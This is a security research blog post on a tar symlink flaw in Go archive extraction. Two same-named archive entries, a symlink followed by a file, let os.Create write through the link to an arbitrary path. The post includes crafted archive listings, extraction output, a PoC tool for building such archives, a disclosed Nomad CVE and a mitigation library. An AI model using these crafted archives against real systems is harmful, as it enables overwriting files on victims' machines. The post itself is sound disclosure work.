I’ve recently been working on some exciting development projects, including a deep dive into archive extraction. During this work, I discovered some fascinating behaviours that I’m thrilled to share with you in the following sections.

TL;DR: Tar archives can contain multiple entries with the same filename. It is important to note that Golang follows symlinks while calling os.Create(name string) (*File, error). This combination can lead to arbitrary writes during file extraction.


Repeating name in tar files

First of all, an archive can contain multiple entries with the same name. Lets take for example the tar file alice.tar (created with ref). The file contains two entries:

$ tar ztvf alice.tar
lrw-------  0 0      0           0  1 Jan  1970 rabbit_hole -> /tmp/wonderland
-rw-r--r--  0 0      0          39  1 Jan  1970 rabbit_hole

The first entry is a symlink, the second is a legit text file. If this archive is extracted with the tar cli, the symlink is extracted and afterwards replaced by the text file:

$ tar xvf alice.tar
x rabbit_hole
x rabbit_hole

$ ls -l
total 24
-rw-r--r--  1 jan  staff   2,5K  9 Aug 17:33 alice.tar
-rw-r--r--  1 jan  staff    39B  1 Jan  1970 rabbit_hole

$ file rabbit_hole
rabbit_hole: ASCII text, with no line terminators

Let’s keep that behavior for now in mind and let us step to the next interesting observation.

File creation in Golang

Files can be created in Golang with os.Create(name string) (*File, error). Data can then be written to the file and it can be closed. The documentation says:

Create creates or truncates the named file. If the file already exists, it is truncated. If the file does not exist, it is created with mode 0666 (before umask).

The interesting thing about this function is that the given name can be an existing file (or even better: a symlink!). My first expectation was that the symlink would be replaced/truncated and replaced with the contents of the file - similar to tarcli behaviour.

I implemented such behaviour in Golang and in Python and it turned out that if we pass a symlink to the create function, the symlink is traversed and the content is written to the target!

Funny, right? 😃

Verification of assumption

To verify my assumption, I picked a wide-spread existing OSS extraction implementation for archives in Golang – mholt/archiver@v3 – which is straightforward to use (full code example):

// parse command line arguments
input := os.Args[1]
output := os.Args[2]

// unarchive the file
archiver.Unarchive(input, output)

// print the result
fmt.Printf("Unarchived %s to %s\n", input, output)

If we use this simple code snipped to extract our previous crafted archive, we get following result:

$ go run ./main.go alice.tar .
Unarchived alice.tar to .

$ ls -l
total 24
-rw-r--r--  1 jan  staff   299B  9 Aug 18:31 main.go
lrwxr-xr-x  1 jan  staff    15B  9 Aug 18:38 rabbit_hole@ -> /tmp/wonderland

$ cat /tmp/wonderland
Hello Alice, welcome to the wonderland!

So, we are capable of archiving an arbitrary write to the filesystem, by traversing the link during the file creation process.

I was as well capable of exploiting this behaviour in hashicorp/nomad, which got remediated in nomad#23738 and disclosed in HCSEC-2024-17 (CVE-2024-7625)

PoC tool: golinkwrite

If you want to create a potential malicious archive, feel free to use NodyHub/golinkwrite to craft your own tar archives with double entries:

$ echo 'Hello Alice :wave:!' | tee rabbit_hole.txt
Hello Alice :wave:!

$ golinkwrite -v rabbit_hole.txt /tmp/hi.txt alice.tar
time=2024-08-09T19:11:35.266+02:00 level=DEBUG msg="command line  parameters" cli="{Input:rabbit_hole.txt Target:/tmp/hi.txt Output:alice.tar Verbose:true}"
time=2024-08-09T19:11:35.266+02:00 level=DEBUG msg="input permissions" perm=-rw-r--r--
time=2024-08-09T19:11:35.266+02:00 level=DEBUG msg="input size" size=20
time=2024-08-09T19:11:35.266+02:00 level=INFO msg="tar file created" output=alice.tar

$ tar ztvf alice.tar
lrw-r--r--  0 0      0           0  1 Jan  1970 rabbit_hole.txt -> /tmp/hi.txt
-rw-r--r--  0 0      0          20  1 Jan  1970 rabbit_hole.txt


The root-cause of this behaviour is that symlinks are traversed during extraction. You can either implement your own checks or use Google’s implementation: google/safearchive to ensure that symlinks from an archive are not traversed during extraction. More details can be found in the blog post The Family of Safe Golang Libraries is Growing!.